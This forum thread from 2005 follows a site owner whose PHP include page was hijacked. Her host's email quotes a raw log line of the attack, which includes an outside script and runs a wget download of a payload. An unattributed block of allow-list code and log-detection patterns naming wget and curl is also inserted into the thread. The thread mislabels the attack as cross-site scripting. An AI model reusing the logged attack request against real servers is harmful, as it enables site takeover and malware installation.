designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Jul-09 23:56
Hello, I need some help, but I am not sure where to post this question. I saw something about not posting URLs but I needed help and I have to explain.
I am trying to build a website. I have been hacked, and was using PHP code, to act like a frame, just replacing the middle of the website. But I was told this was a security risk.
So I am building a new layout. It can be seen here.
[link]
I know the general index.html page should look something like this:
[code]
<html>
<head>
<title>Focus Motorsports</title>
<meta name="description" content="Free web site templates to jump start your new web site.">
<meta name="keywords" content="free site template search graphics build web site">
</head>
<frameset framespacing="0" border="0" cols="125,*" frameborder="0">
<frame name="contents" target="main" src="left_nav.html" marginwidth="0" marginheight="0" scrolling="no">
<frame name="main" src="body.html" target="_self" scrolling="auto">
<noframes>
<body>
<p>Focus Motorsports</p>
</body>
</noframes>
</frameset>
</html>
[/code]
But how do I break down a page like [link] and make it work as frames? If someone could break it down for me, it would be greatly appreciated. I am trying to avoid having pages and pages of menus. So I believe I will need 4 frames. Top, left, middle and right. Actually the top will not change, but I do not know if that should be a frame or what.
Please help soon.
Many thanks
Heather
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Jul-10 00:04
Unless someone has a different solution. I am all ears.
Thanks
Heather
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
Posted: 2005-Jul-10 09:06
Please avoid frames.
They are difficult for search engines to index.
When a visitor arrives at one of the panels from a search engine result, they see only one panel not the whole frame - you then have to mess with javascript to reframe their panel. If they have javascript turned off then your site appears broken to them.
I am interested in how your site was hacked. If they could load content to your site when it used PHP includes then they can still do it when it uses frames. I would continue using includes but make sure your PHP version is up to date and you use a better site password.
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Jul-10 12:43
Hello, Thank you for the advice. I do love how PHP include works. I have it on every site. I was hosting through startlogic and they sent me this info, but they are refusing to help me, won't reply to my e-mails, so I had to buy new hosting and I am out of the last 6 months of my contract.
Here is what they wrote, which makes absolutely no sense to me:
FIRST E-MAIL:
"Your account was suspended because of the following.
using IRC bots. remove files, change password.
st29:/home/focusmot/public_html/images#find .
We need to delete the entire account and create a new account because of this issue. Please reply back when you are ready for the account to be deleted."
******************************
2nd EMAIL
"The problem is that you got hacked at some point and this IRC bot has changed a lot of your files and we do not have a clean back up to replace your current files. This is usually caused by an easy to crack password.
You should normally use an alphanumeric password and even use special characters."
*************************************
And from there, communication has been cut off. I lost my forum and everything. They won't even let me in to back it up. I did not do anything illegal, I don't even know how those bots got there. But the company was rude, so I am moving on. I am now trying to redesign the site to be more active and tougher.
Just gotta figure out how. Like you said, PW protect.
Thanks
Heather
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
Posted: 2005-Jul-10 18:07
Your host didn't have a clean backup of your stuff? What a rubbish host.
Did you also backup your data on a regular basis? No? Hope you do next time.
Looks like some automated "virus-like" process took out your forum. That would probably be a bug in the forum software, that allowed the hackers in, rather than a problem with the hosting itself. Always keep forum software up to date, known exploits are usually exploited within a short while - and many of the exploits use automated searches to rapidly find vulnerable systems.
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
Posted: 2005-Jul-10 18:10
Oh, and even if you do use frames, the forum software still needs to use PHP, so you're focussing on the wrong issue.
lizardz
Joined: Nov 12, 2004
# Posts: 1394
Posted: 2005-Jul-10 19:12
Sounds like you didn't update your forum code when you should have. This problem, as noted, has nothing to do with what kind of HTML you are using, it's a security problem, like they said, easy to guess passwords [good password example: rE5kUu68i bad password example: myname]. A good password is almost impossible to remember.
If you were running phpbb, they have had at least 3 critical updates recently, if you never updated to 2.0.13, assuming you are using phpbb, then your forums were completely open to compromise.
If you are using includes, and are passing those includes data via query strings, and aren't protecting the input data correctly, your server could get hacked by the hacker simply sending the include parameter a script from their own servers, one designed to take your system over.
So many ways to play, moral of the story, learn what internet security is, and then do what you need to do to protect yourself as well as you can. Always do forum db backups, that's not optional, and ideally always run a copy of your forums on your local development box so that if they do get hacked, all you have to do is reupload them, change all your passwords, upload the forum db backup, install it, and you're up and running again in no time.
Forum hacking is a big problem, but it's a big problem mainly because users are not doing the required security updates, so some hosters are being forced into extreme actions, like banning all forum software from their servers, only takes one non secure install to compromise a server, especially if the hoster themselves don't do that great a job on security, which most I think don't.
Remember, despite what everyone says, hackers are your friends, they make your systems more secure by pushing their limits, but you have to keep up or they get to play with your stuff as a reward... at least that's how I like to look at it.
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Jul-10 22:04
Hello,
I had a backup from January when I moved servers. I did not back up the forum since. So I was at wrong there. I always go to PHPBB and download their latest one. Then I add a style. And you know what? Looking at this one on my site now, it says "Powered by phpBB 2.0.6". Do the styles override the original version?
If I reload or update my forum with a newer version, will I lose stuff?
That backdoor for the include sounds confusing. I don't know how to protect that. But the new server I am at now has good security.
The last server did not back up my site.
Thanks for your help.
Heather
lizardz
Joined: Nov 12, 2004
# Posts: 1394
Posted: 2005-Jul-11 02:19
If it says 'powered by phpbb 2.0.6' you haven't correctly applied an update since 2.0.6. That number changes when you do the update if you do it correctly, but phpbb has been having trouble with people not doing the updates right, especially with not running the update_to_latest.php script.
Note I said: people not doing the updates right. There's no problem with the updates themselves, the problem is people just won't take the roughly 5-10 minutes it takes to read the update readme files, and don't upgrade the db when they upload the update files.
The current version is 2.0.16. If you correctly download and install [that means read the directions, follow the directions] the upgrade from 2.0.6 to 2.0.16 you should have no troubles, as long as you have no forum mods. If you have forum mods, you'll need to do it by hand most likely.
After 2.0.13 that number no longer displays unless you are in the forum admin area.
Your version was completely out of date, and probably allowed hackers access, possibly to the server. No amount of server side security can protect software with security holes from being exploited, it's up to you to keep your software, phpbb in this case, up to date.
Re Include security: My best advice is to avoid using methods that you don't understand until you do understand them, it's not that much to learn, but it is something. Look up php security, php include security etc on google and you'll find lots of good articles, some are pretty easy to read. Again, there is only risk if you are loading material based on passed query string parameters and haven't properly protected yourself. If you aren't doing this, if the includes are simply hard coded into each webpage, like include('somefile.php'); there is no risk to speak of from that area.
If you don't update your phpbb, and don't install the security releases quite soon after they are released, you will be at risk. The new versions of phpbb, after 2.0.13 I think, have in the admin section a notification if you are up to date or not.
Re backups: phpbb makes backing up your forum very easy, but again, it does no good if you don't use the tools they give you. If you choose the compressed option, your forum db stuff only takes about 1/10 the size on your local hard disk, that's a good choice. If you don't have recent backups, you should expect to lose everything routinely, because there's a lot of eyes on phpbb software right at the moment, and it's fun for crackers to break your db and forums, it's like spraying graffiti or something. It's best not to be the one that gives the crackers this fun, but it's also best to be prepared, which means doing backups whenever it's called for, if your forum gets lots of traffic and lots of new postings daily, do daily backups. You can automate backups if you are so inclined, but it requires some programming to do it. Having a good backup procedure makes getting hacked a not very big deal in some ways.
Curt
Joined: Eons Ago
# Posts: 3735
Posted: 2005-Jul-13 00:30
Hackers your friend? Maybe they are your friends—the majority of us consider them enemies because they destroy and corrupt things that are at times irreplaceable. They don't help anybody.
lizardz
Joined: Nov 12, 2004
# Posts: 1394
Posted: 2005-Jul-13 09:10
Personally, I like crackers, I like the attitude, I at times make pretty good money cleaning up the problems they create. And it's easy money too I'd add. And I like it when my sites get probed by crackers, it lets me see the security holes I may have missed, otherwise there's no warning. It's because of lightweight crackers that I started updating phpbb forums for example, I used to never think about it, also why I started doing better backups, why my clients have double or triple redundant backups, why I always protect against things like mysql injection attacks. In other words, they pushed me to implement procedures I should have been doing all along but was too lazy to get around to.
If you check out some of the more interesting cracker sites, you'll find this is the prevailing attitude among them, they like finding weakness, and computer types should like knowing about those weaknesses so they can take appropriate action before the problem occurs, not after. For example, on zone-h.org they have a form that asks what your interests are, one option is security professional.
If it wasn't for script kiddies playing with their various toys, MS would never have tightened up their XP and IIS security for example, and then those installations would have been taken over by true professionals happy to monetize in much more serious ways those loopholes, the tech gangs we're starting to see much more of now: russians, asians, whoever, people who can really mess you up. Script kiddies usually just create waves of graffiti that attracts so much attention to the security holes they are exploiting that it forces the companies who may otherwise not have cleaned up their acts in time to start fixing their stuff.
And of course it helps push the alternatives, Mac, Linux etc. A friend is someone who tells you bad news even if you don't want to hear it. It's easier to just believe MS for example when they say: Windows 2000 is totally secure, etc. Not true, but comforting enough to some of the people. I was reading about phpbb weaknesses almost a year before they really started exploiting them. Where? On cracker sites.
Speaking only for myself, these guys crack me up, every new wave of viruses is like an ongoing joke, it's funny to watch everyone scrambling around. Of course, I never host on Windows, usually prefer freeBSD, never use IIS, don't use MSIE or Outlook/Outlook Express, so the stuff is just something that happens to other people, sad news for them of course, but avoidable sad news in most cases.
Respect your enemies and you'll find you do much better, that applies as a general rule too... but best is to befriend them, that goes back thousands of years, sun tzu I think noticed that.
[ Message was edited by: lizardz 07/13/2005 01:32 am ]
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Aug-02 20:37
Well, I got hacked again. This time a different server and a different website. This time the hosting company was nice, and I didn't lose anything. But how do I prevent this!
The hosting company e-mailed this to me:
The logs below expose the hacker's IP and how he/she had entered your website and was able to execute these commands.
(Not sure if I should post this stuff, but I can edit)
201.19.123.228 - - [01/Aug/2005:18:59:21 -0400] "GET /index1.php?inside=http://67.43.156.64/~fernando/scmd.txt?&cmd=cd%20/tmp/.a1b2c3;wget%20http://tudomeu.brdominio.com/mg3.txt HTTP/1.1" 200 4206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
201.19.123.228 - - [01/Aug/2005:18:59:21 -0400] "GET /images/cartcttn.jpg HTTP/1.1" 304 - "http://www.designbyfox.com/index1.php?
And it just goes on.
Then he writes:
"index1.php" is insecure and allows anonymous users to execute commands under your account.
This type of attack is called a "XSS" attack - Cross Site Scripting attack. It can be avoided by verifying your QUERY_STRING instead of just processing each include file as it's read.
For example:
[code]
if ($include == "homepage" ) { include("includes/homepage.inc" ); }
elseif ($include == "aboutus" ) { include("includes/aboutus.inc" ); }
else { print "unknown include"; }
[/code]
I highly recommend looking up on XSS attacks as this is becoming a major issue in the hosting field, a lot of automated scripts have already been released which scour and take advantage of this flaw.
-----------------------------------------
So I have been looking up about this. And I responded to him with questions from my reading. Like I found people telling me to spell out symbols like < > & # (). But I don't see how to fix my code:
[code]
<?php
include("$center");
?>
[/code]
I am willing to pay someone to help, but I have several sites that need to be fixed, so any help will be greatly appreciated.
Thanks, Heather
[ Message was edited by: JimBot 08/02/2005 03:49 pm ... Reason: Fixed Code Typos. ]
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Aug-02 20:38
What the heck is with the lol.
g1smd
Staff
Joined: Jul 28, 2002
# Posts: 10418
Posted: 2005-Aug-02 23:51
What they are saying is that you aren't verifying the values that get sent into your pages, from the dynamic query strings used to access the pages.
Your site will accept www.yoursite.com/yourscript.php?value=some-code-that-hacks-your-site and you should be checking those values very carefully and rejecting anything that is unsafe.
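Putting the host's allow-list suggestion and the advice above together, here is an added example that is not code from the thread or from any poster: the vulnerable include("$center") becomes a lookup in a fixed page map, so the request can only pick a name and never supply a path or URL, and a second function applies the same check the host did to a web-server log line. The $pages map, the file names, the function names and the sample log line are all assumptions.

```php
<?php
// Added example (not from the thread). Replaces   include("$center");
// where $center came straight from the URL (?center=...). The request may
// only choose a key in this map; it never supplies a path or a URL.
$pages = array(
    'homepage' => 'includes/homepage.inc',   // assumed file names
    'aboutus'  => 'includes/aboutus.inc',
    'contact'  => 'includes/contact.inc',
);

// Return the allow-listed file for a user-supplied page name, or null.
function resolve_include(array $pages, $requested)
{
    if (!is_string($requested)) {
        return null;                          // missing, or ?center[]=... array
    }
    // Page names are short plain words. A URL ("http://..."), "../", a
    // null byte or a shell command all fail this test before any lookup.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $requested)) {
        return null;
    }
    return isset($pages[$requested]) ? $pages[$requested] : null;
}

// Flag an Apache access-log line whose query string carries an absolute URL
// or download/command tokens, the pattern the host quoted in this thread.
function looks_like_remote_include($logLine)
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $logLine, $m)) {
        return false;
    }
    $query = rawurldecode((string) parse_url($m[1], PHP_URL_QUERY));
    return (bool) preg_match('#=\s*(?:https?|ftp)://#i', $query)
        || (bool) preg_match('/\b(?:wget|curl)\b|(?:^|&)cmd=/i', $query);
}

if (PHP_SAPI === 'cli') {
    // Constructed log line, modelled on the one in the host's e-mail.
    $sample = '203.0.113.5 - - [01/Aug/2005:18:59:21 -0400] '
        . '"GET /index1.php?inside=http://198.51.100.7/scmd.txt?&cmd=cd%20/tmp;'
        . 'wget%20http://example.invalid/mg3.txt HTTP/1.1" 200 4206 "-" "Mozilla/4.0"';
    var_dump(looks_like_remote_include($sample));                       // flagged
    var_dump(resolve_include($pages, 'http://198.51.100.7/scmd.txt?')); // rejected
    var_dump(resolve_include($pages, 'aboutus'));                        // allowed
} else {
    // Web request: an unknown name gets a 404 instead of an include() of
    // whatever the visitor typed into the URL.
    $file = resolve_include($pages, isset($_GET['center']) ? $_GET['center'] : 'homepage');
    if ($file === null) {
        header('HTTP/1.0 404 Not Found');
        echo 'unknown page';
    } else {
        include $file;
    }
}
```

Run from the command line it only exercises the two checks; served by a web server it replaces the old index page logic, and the log check is what you would run over your access log to spot the same kind of request.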
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Aug-03 02:08
Ok, I have never heard of this. How do I check my values? What is a value? The individual webpages connected to the index page?
lizardz
Joined: Nov 12, 2004
# Posts: 1394
Posted: 2005-Aug-03 05:59
Where did you get the script you are running? If you wrote it yourself, you'll need to learn a bit about validating user controllable input data, if you got it from a script source, don't ever use that source again.
designbyfox
Joined: Jul 09, 2005
# Posts: 8
Posted: 2005-Aug-03 12:48
I got some help. I am all set now. thank you all.